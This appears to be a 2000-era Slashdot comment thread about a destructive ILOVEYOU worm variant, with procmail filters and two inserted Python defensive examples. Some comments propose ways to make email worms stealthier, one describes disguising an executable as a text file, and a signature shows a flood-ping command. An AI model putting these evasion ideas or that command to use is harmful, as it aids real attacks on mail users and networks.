New, More Destructive Love Bug Variant
Everyone and their brother wrote in to say that a new and more destructive version of the ILOVEYOU virus has hit the net. Instead of deleting only a few files, this one deletes every file not in use. And even more amusing, rather than using a hardcoded subject line, it uses the host's email archive to change the subject while it propagates. Intelligent mail client users continue to be unaffected (although the ILOVEYOU sympathy virus has been annoying the heck out of us for days now... it works on the honor system: Please delete some files and mail to all your friends).
This is a security hole that Microsoft knew about, so why the bug icon? It's a design flaw. Most people who read Slashdot use the little icons to gauge what stories they wish to read. I may be completely wrong, but this should have the Microsoft icon, or maybe an MS Outlook icon if Slashdot has one.
Well that was the cheapest two cents on the block.
-- James Dornan AKA TigerSmile
-- Prepared at the direction of, or to be sent to Legal Counsel, in anticipation of litigation. Attorney Client Pri
Alright... then my PDA is better than Linux because it doesn't suffer hard drive crashes. (I don't think a closed-minded person like you will ever see my point.)
I work with ISS frequently and view them to be a very professional and ethical firm.
I did not mean to imply that ISS did anything. I did not mean to finger anyone specifically. I do believe that anti-virus companies have released viruses for more revenue.
I do agree with the kiddies having written the ILOVEYOU and its variants.
If at first you don't succeed, skydiving is not for you.
E-mail administrators?! HAH!! The guy that admins our Exchange box was a Customer Service call guy up until 2 months ago, they just sort of dumped it on him and he had to learn how to use it in 2 days. He's still figuring stuff out, I help him when I can, but until this happened neither of us had worked with an Exchange Server before. Our company is too cheap to hire someone that knows what they are doing, so we end up scurrying around for days trying to solve problems that would take an experienced person 15 minutes....
Ain't work grand?
Kintanon
Check out JoshJitsu.info for Brazilian Ji
Which is why, irrespective of malicious damage, it is always a good idea to back up the home directory. There are other nondirected ways to lose that very important document, such as, for example, catastrophic hardware failure, or even simple accidental deletion by the user.
Backup is not something that should really be neglected.
I've never seen Outlook for the Macintosh, but Outlook Express for MacOS is indeed pervasively AppleScriptable. Not only that, but if you receive a Macintosh executable as an attachment in Outlook Express, its presence is indicated by a blank document icon (rather than the diamond that traditionally indicates an executable file type in MacOS), and the default behavior of Outlook Express on double-clicking the icon is to execute it. So it would be quite easy to make a compiled-as-application AppleScript named something innocuous like 'pricelist.txt'. Most users would probably just double-click the icon, expecting the attached 'text file' to open in SimpleText, and then, well, you get the point. In theory, of course...
This will work for files that are saved to disk, but Outlook will still run the .vbs file.
Mark
This sort of thing can be considered a sort of direct action.
Except, of course, that it's totally indiscriminate; it affects ordinary home users as well as corporations (and, of course, it affects the corporate user's personal files too).
I guess that there are innocent bystanders injured in any "war", but you're supposed to try not to hit them...
Cheers,
Tim
It's official. Most of you are morons.
I just noticed that in the filters I posted, my tab character has been represented as a '>', so if you actually implement these rules, you will want to make that change as well.
You got it... =8-0
> I would imagine if it ever went this high, the email server(s) would just not handle the load.. Or, was it shut down to merely stop people from losing data
Both. The mail system was getting pretty bogged down, and then the sysadmins shut the entire system down in order to be able to clean things up.
The funny part was that they must have put up thousands of hardcopy signs all over the place that morning, warning people NOT to open up email attachments (they even put them up in individual stalls in the bathrooms!), but the worm still spread like wildfire.
Some time later, I sent an email to one of the VPs whose office regularly sent out corporate "communications" in the form of MS Word email attachments, suggesting that perhaps he should set the example of using other, more secure forms of communication. I took a lot of heat for that suggestion, but I still think my point was valid. The company literally loses hundreds of thousands of dollars every time one of these viruses hits, and it's all because the leaders foster a culture of dependence on Microsoft "integration" and careless trust of complex tools.
(**sigh**)
-- Your Servant, B. Baggins
pine would be nice if it had a graphical client as well. zmail did well in that aspect (although I never used it, people who did liked it).
-Jae
Do you think anyone that writes really destructive viruses and gets caught is ever hired on at anti-virus software development companies?
You always hear about old school hackers that take someone down, then get a job heading up their security department because they were so impressed with the hacker's work. Just wondering if this works in other arenas...
Long signatures suck.
What the virus should do is, do nothing destructive to the machine, instead give the user a message listing all of the bad things that could have happened because they use Microsoft products, and propagate itself.
If writers stopped creating virii...
Please see Tom Christiansen's article on the plural of virus.
If I have to put up with "an email", then the rest of you have to put up with "virii".
Later,
Blake.
you could try using the task scheduler and batch files
.oO0Oo.
you could even write a VB exe to take care of it
There are places where the networks are not touching, and there are places where they are. - Boeing's Lori Gunter
Hey, that's some proactive sysadmin there!
"I will take the Ring," he said, "though I do not know the way."
How many owned boxes does MS have?
- Propagate itself
- Dissolve the relationship between script files and the WSH
- Uninstall the Windows Scripting Host
- Delete itself
I imagine that it can be done. If not totally through the WSH, then the beginning can be, and then the rest through a loaded C or VB module. Of course, you'd still get into a heap of trouble if you did that, though you would be protecting people...
No need. Once someone sends you one you have the code (it's a VBScript text file... not a compiled program). Of course, if you have Outlook (I heard it's quite popular ;) ) you'll want to be sure to Save As the attachment and not open it directly (not that you didn't know this, but other people may be reading this).
Of course, one could just go over to Microsoft and read the VBScript documentation to create their own Herbie the Love Bug.
-- @rjamestaylor on Ello
Could someone please alter this virus so that its payload turns off the registry setting that allows it to propagate, and end this mess once and for all? A self-vaccinating virus, what a concept. Then we can safely ignore this problem (for a while).
I think you mean no virus should be able to write to its own executable image. That would only prevent some weird, twisted self-modifying (but possible) virii. The virus could just write a new file and copy itself byte by byte, then exec the new virus.
In any case, the computer wouldn't work at all if processes were denied read access to its executable image: no process would ever be able to read its text segment (program instructions)! This would be quite a problem for every program. ;)
As for some of the up and coming AV firms, I wouldn't put it past them, however in this case I think it's just kiddies having fun with a mechanism that someone else wrote, doing it just for grins and bragging rights.
More race stuff in one place,
than any one place on the net.
. . . check out this file, on the Samhain project. This is basically a polymorphic-stealth worm system, that was developed as a proof-of-concept (and was never finished).
It's cross-platform (as in, Unix and NON-Unix), it goes really far to evade detection and analysis (not to mention removal), and the freakiest part of it is, the whole system was designed to work in a distributed, intercommunicable fashion ("wormnet"). It's scary shit. Especially an observation the lead programmer makes near the end-- "sure, we didn't release this, but what if some other intelligent but deranged programmer out there has?"
iSKUNK!
Viruses are challenging and interesting. Some of the ideas used in them have been incorporated into modern software. Just like anything else, if you don't use viruses to harm people or data there is nothing wrong with them at all. Why do Linux hackers write code that they will give away? They like the challenge.
I always thought that it would be cool to write a virus killer virus. It would search out a few known viruses and destroy them.
Environmentalists are their own worst enemy. ~tricklenews.com
This might cause problems when trying to run .vbs files from some other program, but I would imagine most people would not need to do this. It would be better if there was a way to get Outlook to use a different command (such as Edit) as the default action, but I'm not sure if this is possible.
--Bob
1^2=1; (-1)^2=1; 1^2=(-1)^2; 1=-1; 1=0.
Hmmm....on my box, where I did the above, it opens the editor, just like it should.
It is my impression that Outlook "opens" the file by running the default action on it. If you set the default action to "Edit with notepad", you should be safe.
At least, it works that way on my Win2000 box, running Outlook.
The cake is a pie
I was thinking something like the "hillarystwatwarts" virus, but even more subtle. Something that would get repeated for a few hours or days before people realized what they were saying. It would probably have to be something like, I dunno, remember the "dole means penis in iranian" rumor?
-fb Everything not expressly forbidden is now mandatory.
I thought it was people like Kevin Spacey who gave a bad name to showers...
Later,
Blake.
There already is one - see : PrettyPark and ExploreZip
Hey, while we're limiting ourselves to command-line email, why bother with a client at all...
:)
Telnet to the relevant port on the mail server and send/read there.
Hey, watch it. You're posting copyrighted code in its entirety. Next thing we know, some Philippine dude is going to write a letter to Andover saying that Slashdot is posting copyrighted code, and to remove it immediately!!
Two things we are doing to fight this nonsense:
1. When our tech support talks to our users, we have been advising and walking them through uninstalling WSH and/or removing associations to vbs, hta, shs, etc.
2. We installed a procmail filter to "trap" all the vbs scripts and the known exe virii sent in the email that go through us. It also goes through and "defangs" the html code in any html email.
Since we implemented this filter, we have trapped thousands of poisoned files, which means that our users did not get infected with them, or spread them.
The place to get your copy of the procmail filter? http://www.wolfenet.com/~jhardin/procmail-securit
Microsoft Security is the ultimate oxymoron.
My 1.5 cents
********
********
Windows has detected several mouse-clicks, restart for the changes to take effect.
Better to be hit by a weak one, churn out the antibodies, and be better prepared for the nasty one.
Long signatures suck.
The main "problem" with iloveyou was that it is too easy to identify. Everybody who turned on his TV or radio knew that he should not open mails with the 'i love you' subject. This new variant is already much better; taking the subjects from the INBOX is a good idea, but putting the "FW:" in front of every subject makes it quite easy to detect. Just imagine a virus that
- answers mails in the inbox automatically, puts "Re:" in front of the subject, quotes the whole message and writes a few sentences, perhaps using an algorithm similar to "the doctor" in emacs. I think using the INBOX is a key point, as inexperienced users often don't use the address book, even though they are the most vulnerable.
- has some less obvious subjects for those recipients in the address book that aren't in the INBOX. Perhaps subjects like "next friday" or "hi.." would be more appropriate.
- analyses the mail clients of users in the inbox to send the right variant to everybody. Perhaps there are similar vulnerabilities on Macs?
- analyses the nationality/language of the user by analysing the domain name
If someone did this one month ago (before people knew of iloveyou) this could have been the end of most windows installations. "There is no good or evil, there is only fun and boring." - The "Bad" guy in Hackers.
Later,
Blake.
The fact is, as far as the average person is concerned, this is a security problem with email and the internet in general. They don't know what a vbs attachment is, and they certainly don't know that it is a brain-dead-obvious problem with M$ products and nothing else on this planet. They don't know this because nobody is telling them. I've read dozens of articles in the mainstream (esp. the lowbrow, tabloid type) press lately and this fact is never mentioned.
If you have doubts about this, take a look at this post (http://slashdot.org/comments.pl?sid=00/05/17/1411239&threshold=0&commentsort=0&mode=thread&cid=237), dealing with the congressional hearings last week on the 'Love Bug'. Especially disturbing is the exchange between the congresswoman, who clearly understands that it is a M$-specific problem, and the so-called 'technology expert' who is doing his best to obfuscate the point.
Call me paranoid, but it reminds me of the old "red scare" tactics, and I'm worried that an effort is being made to prepare the populace for some new, highly restrictive and repressive laws dealing with software and the internet. And let's face it, software and the internet is one of the few areas in our society in which freedom has been increasing of late. Keeping the public ignorant of the real situation will be critical to the success of any effort to reverse this trend.
I don't understand why the justice department, supposedly scouring the earth looking for evidence of harm done to consumers due to M$'s monopoly position, is not picking up this one. Surely this is a smoking gun, with fingerprints, and a pile of dead bodies for their case. The only plausible explanation is that there is a larger strategic imperative at work, in which the power of the general populace is deemed more pernicious than that of monopolistic corporations.
This discussion needs to spread beyond the confines of technology forums such as this, and into the mainstream consciousness, before it's too late.
It's probably too late for people to read this, but from now on, I have started signing ALL emails with attachments, so people know I'm not sending a virus. Hopefully more people will do the same, since VBScripts can't read your mind and figure out your passphrase.
--
The other side is crowded. The dead have nowhere to go.
take a triptonica to subthunk
I've never heard about it. Did I miss a story?
Virus experts are predicting that the spread of this variant will be slower than the original Lovebug virus, because of the 'mutation' that it tries to perform on itself.
This may mean it can spread further. The more time it takes, the less hysteria will surround its spread.
Every time it mutates, it adds up to 10 lines of crap to itself, in order to try to avoid detection. It ends up being huge after a moderate number of iterations.
No doubt someone is working on version 2 which will use more sophisticated algorithms for mutating.
Any IT admins (and of course, end users) who don't rely on Microsoft products should be joyous right about now -- they are immune.
During a workterm I had a couple years ago, they were migrating everything to Microsoft.
Including outlook.
Poor poor sysadmins. =)
Ok, then change it to look like this:
# The bracket after "Content-Disposition:" holds a literal tab and a space
# (the original posting turned the tab into a '>').
:0 Bf
*!^X-Loop: VBS viruscheck
*^Content-Disposition:[	 ]+.*[Aa]ttachment.*\.[Vv][Bb][Ss].*
|/usr/local/bin/sed -e '/Content-Disposition:/{N; s/filename=\(.*\)\.vbs\(.*\)/filename=\1.vbs.txt\2/i;}' -e '/Content-Type:/{N; s/name=\(.*\)\.vbs\(.*\)/name=\1.vbs.txt\2/i;}' | /usr/local/bin/formail -i "X-Loop: VBS viruscheck"

:0 Bf
*!^X-Loop: JS viruscheck
*^Content-Disposition:[	 ]+.*[Aa]ttachment.*\.[Jj][Ss].*
|/usr/local/bin/sed -e '/Content-Disposition:/{N; s/filename=\(.*\)\.js\(.*\)/filename=\1.js.txt\2/i;}' -e '/Content-Type:/{N; s/name=\(.*\)\.js\(.*\)/name=\1.js.txt\2/i;}' | /usr/local/bin/formail -i "X-Loop: JS viruscheck"

:0:
$ORGMAIL
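The same defanging idea as the procmail recipes above (and the wolfenet filter mentioned earlier in the thread), as an added example that is not part of the thread or of either filter kit: a Python function that parses a message, renames any attachment whose name ends in a script extension so that a double-click opens it as text rather than running it, and stamps a loop header so a message is only rewritten once. The extension list, the loop header name and the sample message are my own assumptions and constructions.

```python
"""Rename script attachments so a mail client will open them as text.

Added example, not code from the thread or from any procmail filter kit.
Extension list, loop header name and sample message are assumptions/constructed.
"""
import email
from email import policy
import re

# Extensions the thread names (vbs, js, hta, shs) plus a few other WSH/executable
# types; this list is an assumption, extend it to local policy.
SCRIPT_EXTENSIONS = ("vbs", "vbe", "js", "jse", "wsf", "wsh", "hta", "shs", "exe", "pif", "scr")
LOOP_HEADER = "X-Loop"              # same idea as formail -i "X-Loop: ..." in the recipe
LOOP_VALUE = "script-attachment-defang"

_SCRIPT_RE = re.compile(r"\.(?:" + "|".join(SCRIPT_EXTENSIONS) + r")$", re.IGNORECASE)


def defanged_name(filename):
    """Return filename + '.txt' for a script attachment, else None."""
    if filename and _SCRIPT_RE.search(filename):
        return filename + ".txt"
    return None


def defang_message(raw):
    """Rewrite attachment names in a raw RFC 2822 message.

    Returns (new_raw, renamed) where renamed is a list of (old, new) pairs.
    A message that already carries the loop header is returned unchanged.
    """
    msg = email.message_from_string(raw, policy=policy.default)
    if msg.get(LOOP_HEADER) == LOOP_VALUE:
        return raw, []
    renamed = []
    for part in msg.walk():
        if part.is_multipart():
            continue
        old = part.get_filename()
        new = defanged_name(old)
        if new is None:
            continue
        # The name can live in Content-Disposition (filename=) and in
        # Content-Type (name=); rewrite whichever is present, as the sed
        # recipe does, so no client falls back to the unrenamed copy.
        for header, param in (("Content-Disposition", "filename"), ("Content-Type", "name")):
            if part.get_param(param, header=header) is not None:
                part.set_param(param, new, header=header)
        renamed.append((old, new))
    msg[LOOP_HEADER] = LOOP_VALUE
    return msg.as_string(), renamed


def attachment_names(raw):
    """List the attachment filenames a client would see (used to verify the rewrite)."""
    msg = email.message_from_string(raw, policy=policy.default)
    return [p.get_filename() for p in msg.walk()
            if not p.is_multipart() and p.get_filename()]


# Constructed sample: a lure with a double extension, plus a harmless PDF.
SAMPLE_MESSAGE = """\
From: friend@example.com
To: user@example.com
Subject: FW: pricelist
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b0"

--b0
Content-Type: text/plain

Please see the attached price list.
--b0
Content-Type: application/octet-stream; name="pricelist.txt.vbs"
Content-Disposition: attachment; filename="pricelist.txt.vbs"

' constructed placeholder, not script code
--b0
Content-Type: application/pdf; name="report.pdf"
Content-Disposition: attachment; filename="report.pdf"
Content-Transfer-Encoding: base64

JVBERi0xLjQK
--b0--
"""

if __name__ == "__main__":
    rewritten, changed = defang_message(SAMPLE_MESSAGE)
    print("renamed:", changed)
    print("attachments now:", attachment_names(rewritten))
```

Renaming rather than dropping keeps the original bytes available for analysis and for the rare legitimate script, while removing the one-click execution path the thread complains about; the loop header plays the role of formail's X-Loop so a message relayed through the filter twice is not renamed to .txt.txt.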
"Intelligent mail client users continue to be unaffected" - is that users of intelligent mail clients (aka not LookOut) or intelligent users of mail clients (aka those who don't open attachments anyway)...
;)
Just wondering
miLady
This is not a signature.
Someone in our company got this one this morning.
Luckily she had the good sense to call me because of the 20 or so e-mails sent around about NOT OPENING attachments. So I talked her into deleting it without opening it. YAY! Hopefully none of the higher ups will get one; they are dumb enough to open it without thinking about it...
Sigh...
Kintanon
Check out JoshJitsu.info for Brazilian Ji
I use an NT network in my job and I get a lot of e-mail. I didn't receive a single I LOVE YOU message; probably the sysadmins (about 200 km from where I am) are doing the same as you are.
:-(
Even so, Windows users are at a disadvantage, for it leaves a bitter taste in our mouths like nobody loves us...
- A.P. (seriously, folks, WHAT ELSE is VBscript for?!)
--
"One World, one Web, one Program" - Microsoft promotional ad
"Remember when the U.S. had a drug problem, and then we declared a War On Drugs, and now you can't buy drugs anymore?"
I'm in a fortunate position to be sysadmining a group of Windows users, basically with the authority of our PHB in matters related to computer security (= I don't have to waste time arguing about my decisions with employees). The PHB only wants me to report changes in the policy to him.
Rule 1: No Outlook allowed.
Rule 2: VBS disabled by default.
Rule 3: Never, ever run anything from an attachment. If you do, and our system gets screwed, there's hell to pay (up to getting fired/summary execution).
Rules 4-: (standard security things like passwords etc.)
I think the rule number three has been most effective. After you get employees convinced that they can actually get fired for running an attachment, things get much simpler. I know it's a "reign of fear" but that's what you get for running MS-crap.
Why don't we start taking the usefulness of a virus back?
What I mean is, why doesn't someone write a virus that does good? It could auto-run and disable all of the cheesy security holes that MS hasn't fixed yet. It could spread like a worm, and just go on a rampage fixing problems.
Why must virii always be bad?
I have YET to receive ANY of the 'vbs' email worms in any email I've ever received.
Hehe, subscribe to linux-kernel, I laughed my ass off when I got this email.
There followed two or three automated virus warnings no human bothered to answer. Pretty ironic it was.
Like "Tuxissa"? (from segfault)
-----------
-----------
100% pure freak
I'm surprised no one has mentioned this wonderful procmail setup/script that has been around for some time to protect against HTML or file attachments in email.
http://www.wolfenet.com/~jhardin/procmail-security.html
I've been using it for some time and it has protected myself and my users against almost any macro virus I have heard about.
Intelligence and talent are not a measure of mental stability. People who write destructive code obviously have some problem with responsibility.
I don't believe that such acts are always intended to be some attempt to educate the technically unaware amongst us.
It's a crime, not a practical joke; and not always committed by the spotty teenagers the press would have us believe.
You can lead milk to a rolling horse, but too many cooks break glass houses.
Does any mailing system apply 'quotas' to its users? E.g. no more than 1000 e-mails per day, no more than 1 e-mail every ten seconds?
Ciao
----
FB
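One way to implement the quota the post above asks about, as an added example that is not part of the thread or of any real MTA: a per-sender sliding-window limiter enforcing the two limits the post names (one message per ten seconds, a thousand per day), run over a constructed send log containing a normal user and an account that is emptying its address book in a few seconds. The class, its defaults and the sample log are my own construction.

```python
"""Per-sender outbound mail quota of the kind the post asks about.

Added example, not code from the thread or from any MTA; the limits are the
post's numbers, the class and the send log are constructed.
"""
from collections import defaultdict, deque


class OutboundQuota:
    """Sliding-window limits per sender: burst (1 per 10 s) and daily (1000 per 24 h)."""

    def __init__(self, burst_limit=1, burst_window=10.0,
                 daily_limit=1000, daily_window=86400.0):
        self.rules = ((burst_limit, burst_window), (daily_limit, daily_window))
        self.longest = max(window for _, window in self.rules)
        self.history = defaultdict(deque)   # sender -> timestamps of accepted sends

    def check(self, sender, now):
        """Decide one send at time `now` (seconds). Returns (allowed, reason).

        Only accepted sends are recorded, so a rejected burst does not
        extend the sender's lockout beyond the windows themselves.
        """
        sent = self.history[sender]
        while sent and now - sent[0] >= self.longest:   # drop entries older than a day
            sent.popleft()
        for limit, window in self.rules:
            recent = sum(1 for t in sent if now - t < window)
            if recent >= limit:
                return False, f"{sender}: {recent} sent in last {window:g}s, limit {limit}"
        sent.append(now)
        return True, "ok"


def simulate(events, quota=None):
    """Run (sender, timestamp) events through a quota.

    Returns {sender: (accepted, rejected)}; a sender with many rejections in
    a short span is the signal an admin would alert on.
    """
    quota = quota or OutboundQuota()
    tally = defaultdict(lambda: [0, 0])
    for sender, ts in sorted(events, key=lambda e: e[1]):
        allowed, _ = quota.check(sender, ts)
        tally[sender][0 if allowed else 1] += 1
    return {sender: tuple(counts) for sender, counts in tally.items()}


# Constructed send log: a person mailing once a minute, and an infected
# account sending 40 messages in eight seconds.
SAMPLE_EVENTS = (
    [("alice@example.com", 60.0 * i) for i in range(5)]
    + [("infected@example.com", 100.0 + 0.2 * i) for i in range(40)]
)

if __name__ == "__main__":
    for sender, (ok, dropped) in simulate(SAMPLE_EVENTS).items():
        print(f"{sender}: accepted {ok}, rejected {dropped}")
```

The burst rule alone stops a mass-mailer cold (one message of the forty gets out), while the daily rule catches a slower drip; the counts it returns are also a cheap outbreak detector, since a human rarely trips the ten-second limit dozens of times in a row.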
Funny yes, but people seem to be missing the fundamental reason why this happened.
It has nothing to do with MS letting people run attachments without saving them first.
This is all about mapping extensions to applications.
This is a broken idea - totally. For starters it is quite simply dangerous, as the mappings happen everywhere. And installing an application might set up random mappings. But add onto that the fact that it's used to associate scripts with their executor, much like the shebang line, only worse - the file needs no execute privileges. If you like, every mapped file extension automatically sets execute privileges. It is this functionality that is broken - not the mail client. And this has been in existence since DOS days, IIRC. So removing or fixing this "feature" is next to impossible.
Good luck MS fans - it's a rocky road ahead.
Matt. Want XML + Apache + Stylesheets? Get AxKit.
This will protect local delivery, so users POPing in or whatever will be OK. But what I would like to see is a good sendmail rule to put on the mail gateway for stopping this. I've gathered that the Content-Disposition header is key to stopping it, but I'm not sure sendmail will recognize it as a header to look at (haven't put my test in place yet). I'd like to kill it before my gateway sends it on to the Exchange side of the house...
At the GeekPride Festival, several of the Linux boxen were rooted. Some friendly chap installed FreeBSD instead. I thought that was cute, although a bit annoying.
--
The other side is crowded. The dead have nowhere to go.
The best solution would be for all "executable" attachments to be treated as untrusted code with a sandbox like a Java Virtual Machine - considering Microsoft's "expertise" in "enhancing" Java this should not be too difficult a solution to implement.
Port Outlook (and the brain-dead fondness for executing anything executable) to *nix and you'd still have as much of a problem.
Sure, Win'9* security is broken, but it's not bad security that's the problem here. I want Outlook to do anything I personally have the rights to do. I want Outlook to have a scripting language, and to offer mail services to other scripting languages (this is useful). The only thing I don't want Outlook to keep doing is executing code from anywhere that I haven't told it absolutely explicitly to do so. I don't want signing - what am I going to do ? Sue them ? I can't even email my lawyers, as they've just eaten my address book.
Win2K has brought its security concepts into the '80s, with Kerberpoodle the 2-headed mutt. We'll see how solid the implementation is, but at least they're making an effort.
Am I the only one who misses the old school viruses like Empire Monkey.B?
---
-
ping -f 255.255.255.255 # if only
---
This sig has been temporarily disconnected or is no longer in service
You do not really think that a real virus writer would answer to you? That would be very unprofessional of him/her and dangerous too.
You can't handle the truth.
No, sadly that would violate the DMCA...
(Or should that be "Virus Building System"?)
Information wants to be free -- but informants want to be paid.
I'm proud to say I once almost got kicked out of Microsoft for sending something like this to a relatively large e-mail alias. (I know, I shoulda tried harder.) The one I sent was actually embellished slightly by a friend:
And whatever you do, don't try to remove this virus from your system. If you do, it will immediately mail the IRS and tell them you had $2,500,000 in unreported income last year. From dealing drugs.
--
Someone you trust is one of us.
Linux is less susceptible to viruses, thanks to its multiuser-structured security system. It's MUCH HARDER to write a linux virus than a windoze one. And even then most linux viruses can do little more than delete your home directory, not take the whole system down irreversibly, unless you're stupid enough to deliberately run them as root.
I disagree. Just because it's not socially acceptable or ethical by your standards doesn't make it not art. Art is subjective, and defined by the enjoyment of its creator, and its appreciators.
As long as the creator derives enjoyment from his creation, it is indeed art for him (and yes, that would make baking cakes art...). And as long as there are people out there who appreciate the effects of his art (here I'm referring to many non-Windows users who recently got a great deal of entertainment) or the code that drives its behavior (in this case the actual code), it *is* art.
Incidentally: murder has been considered art before. So has crime. Many people refer to committing certain crimes well as an artform.
I mean, if we go by your definition, then IMHO, modern art is not only NOT ART, but I should probably sue those artists for producing such drivel, and causing me mental trauma!
Notice, however, that I do not. Just because I don't enjoy it, and just because I kill off 5 brain cells every time I look at one of those exhibits, doesn't mean it's not art!
I agree that unix is more secure but it does not seem to be set up to deal with hostile processes. Suppose that you are running X. Then it (any hostile process) can read off all your keystrokes and so find passwords PGP encoding etc. It can also edit *your* startup scripts (eg .cshrc) to make sure that it gets run whenever you login. This may take a time but if it doesn't do anything nasty until it has gathered its information and spread then that does not matter, in fact it may be an advantage as there is less panic about it. Of course this all assumes that someone chose to execute the hostile script....
<Script Language=JavaScript>
document.write("Best viewed with ");
if (navigator.appName == "Netscape") { } else { }
</Script>
Even works for Opera
Using HTML in email is like putting sound effects on your phone calls. Just say <strong>no</strong>.
First I want to start off with a comment on the First Post message. Anyone who posts those stupid "first post" messages needs to get a life. It is very lame to see 5 messages (let alone 1) that all have something to do with being the First Post. Ok, on to what I was going to talk about. Anyone who thinks that only people that use MS Outlook will get infected with this (and other) virus [trojan, or whatever you want to call it] needs to realize that ANY MS Windows based email client that allows the user to either open an attachment directly, or save the attachment so the user can run it, is able to get infected with these types of viruses. MS Outlook is only needed to spread itself to the people in the infected person's Outlook address book.
I am using Win98, Outlook2000, and the preview pane. Yes the virus showed up in my inbox. Because I have more than one braincell, I immediately recognized the .VBS file as a virus and deleted the e-mail. Case closed. Is linux better because if you were to open the attachment it wouldn't work? That's like saying that the windows platform is better because a virus targeted for Unix systems will not affect it. I thought the whole point of Linux was the functionality. You can make it do anything you want. It sounds to me like the people screaming MS sucks over this feel we need an AOL style OS (OS for dummies) to keep dumb users from executing viral code. It comes down to user education. If you aren't sure what it is, don't open it. Simple.
I work for an ISP; our customer service inbox is full of these. We call them back, tell them what is wrong and help them scrub. Most likely you just know smart people.
Cypherpunks: Civil Liberty Through Complex Mathematics. Those who live by the sword die by the arrow.
We're just going to have to agree to disagree on this one. As a programmer, I find nothing 'humorous' about destructive viruses. The fact that people with programming skills (which only a small percentage of people actually have) use them to write programs that purposely hurt other people (no, not companies, but the people who work at them) makes me really angry. To put it nicely. If these individuals would use their obvious skills to write useful code, maybe we could program Microsoft into non-existence. :) As far as I'm concerned, virus writers are parasites, and like the big tick I picked up once a few years ago while hiking in the woods, we simply can not get rid of them quickly enough. I hope you don't consider my reaction too extreme and simply discount it as raving. I know many programmers and not a single one of them has any sympathy whatsoever for virus writers. Yes, most people do need to become more technologically savvy, no question, but do they have to have their hard work and personal files destroyed to get them to do so? For me, that's an unequivocal NO. There is a big difference between slapping a child's hand to keep it away from the stove and shoving the kid's hand onto the burner. 'Nuff said.
Yes, I could write a bash script or perl script that deletes files. Guess what, not everyone uses bash and has perl on their unix system, and if they did, it would only delete their user files, and NO system files would be affected. Unix was built on a concept of security. With Windows, security was an afterthought, and not a very complete one.
Besides, unix users (as a whole) tend to be a little more tech-savvy and know not to run things like that.
As CmdrTaco said, intelligent e-mail users continue to be unaffected.
Finkployd
I can't claim that I'm perfect, I try to help my high-school be immune from these things, but my dad opened the ILOVEYOU e-mail at work... and he works for the Coast Guard computer systems.
What needs to be done:
- Change the defaults for Outlook, etc. so that worms like the ILOVEYOU worm and its rip-offs cannot be automatically run.
- EDUCATE! The mindless Windows user tries to make things as simple as possible, so they set themselves up for attack.
I can sympathize with both sides. I used to use Windows at home, and was once one of the people who would have opened a letter like that; now I have a Mac and a Linux machine, and have changed the defaults on the family's Windows machines so that no matter what my parents do, they can't be hit. Education needs to come about, and Microsoft isn't going to educate anybody, unless they make the bouncing paperclip start telling people about computer security, although I'm not sure that we would want people to hear Microsoft's version of computer security.
My two cents,
Gawyn
Freedom of Speech?
I wish I was joking.
Richard
Please, a nice distinction needs to be kept in mind between those who are not focused on computer technology, and those who actually are "stupid". I would not deny that stupid folk exist, but it does one no good to call someone stupid just because their area of interest is not the same as one's own.
E.g., I do not find accounting of interest, but this does not cause me to consider myself stupid, even though it sometimes causes me hardship. (Of course I could just quit that book club, but I don't like that choice either.)
I think we've pushed this "anyone can grow up to be president" thing too far.
I am glad, I didn't see python there. :-)
------ Curiosity killed the cat. {satisfaction brought it back | it didn't die ignorant | lack of it is killing mankind
It's harder to write a script that will run in Linux than it is to write a VB script. It's like martial arts...the discipline teaches you not to do harmful things, maybe.
Ceterum censeo Microsoftam esse delendam.
It's been done. See http://www.finjan.com and download your free copy of SurfinGuard. It's for 95/98/NT but it seems to do the job. They've got some non-destructive demos on their web pages you can download to make sure that SurfinGuard is working.
But I always thought a worm had to be self-mobile, too -- that is, the LOVEBUG needs human intervention to become active on a system, while (in my mind) a worm would simply connect directly to that machine and immediately begin executing.
The Morris Worm worked that way -- once released, it had a life of its own without any need for anyone to click on an attachment. If you consider a replaced .jpg file or a faked attachment to be executables (they are, just with no other functionality), then this is really much closer to the classic "virus" def.
david.
Nearly right,
the next variant will contain a variant on the words "Trade Secret" for title, an HTML-based JavaScript click-through license for a body (starting and ending with a load of legal mumbo jumbo and containing perhaps one sentence of warning as to what is about to happen), and a Debian install starting with delete all partitions.
BTW, the only target will be M$
Never underestimate the dark side of the Source
I am personally extremely tired of having to panic for the latest virus and scrambling to McAfee.com every time some script-kiddie makes something that he thinks is 31337, so that everyone can ph33r his skills.
Question is, does anyone know what the names of some of these profile scanners are? I had an email a while back with the info, but it seems to have gone the way of the dodo.
"See, we plan ahead! That way, we never have to do anything now."
Blocking attachments seems like a "throwing the baby out with the bathwater" kind of solution.
---
This sig has been temporarily disconnected or is no longer in service
So let us start terming the bug as a Windows bug or Windows virus instead of a generic computer bug. This goes a long way in getting the mindset of people that if you want to be on the Internet, use a secure OS - Mac, BeOS or Linux, pick your choice.
I partially agree with you in that this is a Windows-specific virus. I disagree, however, with your comment indicating that the cause is lacking the security of Linux. The real issue is the availability of VBScript on the client, which in turn gives the attackers access to the local file system.
Our company runs both Windows and Linux 7x24 (with a few reboots here and there on the Windows boxes every day, of course ::wink::). We've received the ILOVEYOU attachments and just laughed at them because our e-mail clients don't support unrestricted scripting, even on the Windows machines, where we run Netscape Messenger. Netscape Messenger, while it allows JavaScript, doesn't allow unrestricted access to the file system and other Communicator resources like VBScript does.
We perceive unrestricted scripting access from the e-mail client as the real problem, not Windows itself. Any system that allows unrestricted scripting privileges (even *NIX systems) to its users is vulnerable to malice.
As for Macintosh and BeOS being "secure", I just beg to disagree. Perhaps you know something about them that I don't about them. Would you care to expand on exactly what makes them inherently secure when compared to Windows?
In conclusion: Our recommendation to our customers is very simple: Get off MS-Outlook/MS-Exchange for e-mail. IMAP and an appropriate e-mail client will do the same job without having to worry about VBScript viruses.
Talk to you later,
Eugene
http://eugeneciurana.com | http://ciurana.eu
You suggest that the more coding a person learns, the more disciplined they get. This is kind of like the martial arts model, where you learn discipline that keeps you from using your powers for evil. But coding is easier to learn, what with script kiddies and tools like VBS. People who are too dumb to think about the consequences of their actions can write devastating things. I'm glad that hacking can be more egalitarian, but...
Ceterum censeo Microsoftam esse delendam.
You should be able to place a filter like this on a sendmail gateway host by using sendmail's mailertable feature in your .mc file, and then saying:
host.com procmail:/etc/procmailrcs/host.com
in the mailertable file, and set the host.com file to something like:
(rules for checking spam, viruses, evil attatchments, etc.)
:0
! -oi -f $forward_message_on_properly_to_internal_mailserv
